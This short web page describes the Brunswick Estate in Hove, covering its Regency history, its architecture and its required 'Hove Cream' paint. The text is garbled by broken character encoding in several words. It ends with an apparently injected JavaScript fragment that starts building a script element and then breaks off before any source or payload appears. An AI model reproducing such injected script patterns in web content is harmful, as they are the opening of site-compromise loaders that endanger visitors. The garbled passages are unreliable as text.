Wide boulevards, Regency buildings, beautiful lawns and promenades.
In 1820a��s The first housing development in Hove was Brunswick Estate. Its Regency architecture, looking out to sea from around a central garden, typifies what makes Brighton and Hove different from any other coastal resort.
The Brunswick Estate – comprising Brunswick Square, Brunswick Terrace and Brunswick Place, and the immediately surrounding streets, is one of the finest set-pieces of Regency architecture in Britain.
The estate was built largely as a speculative development, reaping the rewards of the European peace of 1815, which had revived the economy and led especially to investment in property.The main streets were named in honour of Caroline of Brunswick, wife of the Prince Regent, (later George IV). Built between 1826 and 1840, it helped Hove to develop as a fashionable counter-point to Brighton.
Many of the houses have distinct rounded faA�ades, with the terraces often grouped either side of a row of more formally classical designs, incorporating Corinithian and Ionic columns and pilasters. Over the years, the houses have mostly been redeveloped into flats, many of which became run down.
To preserve the architectural unity in 1976 an Act of Parliament was passed, which requires the owners to paint the houses every 5 years, and specifies the exact paint which they are to use! The warm, yellow colour is officially known as a�?Hove Creama��.
This remains one of the most impressive pieces of early 19th century architecture in Britain.var d=document;var s=d.createElement(‘script’);